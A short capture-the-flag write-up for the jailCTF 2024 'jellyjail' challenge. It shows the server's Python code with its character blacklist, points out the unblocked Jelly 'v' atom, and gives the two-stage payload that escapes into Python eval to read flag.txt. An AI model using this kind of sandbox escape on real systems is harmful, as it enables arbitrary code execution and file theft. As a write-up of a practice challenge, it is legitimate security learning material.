← Back to home

jailCTF 2024 — jellyjail

how can one golf with jelly if it just explodes when you hit it with a large metal golf club?

nc challs1.pyjail.club 5999

We're given a Python server that looks like this:

Code (py): 

1#!/usr/local/bin/python3
2# https://github.com/DennisMitchell/jellylanguage/tree/70c9fd93ab009c05dc396f8cc091f72b212fb188
3from jellylanguage.jelly.interpreter import jelly_eval
4
5inp = input()[:2]
6banned = "0123456789ỌŒƓVС"  # good thing i blocked all ways of getting to python eval !!! yep
7
8if not all([c not in inp for c in banned]):
9    print('stop using banned')
10    exit()
11
12jelly_eval(inp, [])

The server bans numbers and a few eval atoms, but they seemed to have missed lowercase v:

image

Then, we can send

Code: 

1ɠv

as our payload to read a line from STDIN and evaluate it as Jelly, circumventing their blacklist. Without a blacklist, we can send

Code: 

1“print(open('flag.txt').read())”ŒV

to evaluate

Code (py): 

1print(open('flag.txt').read())

as Python code and get the flag.

image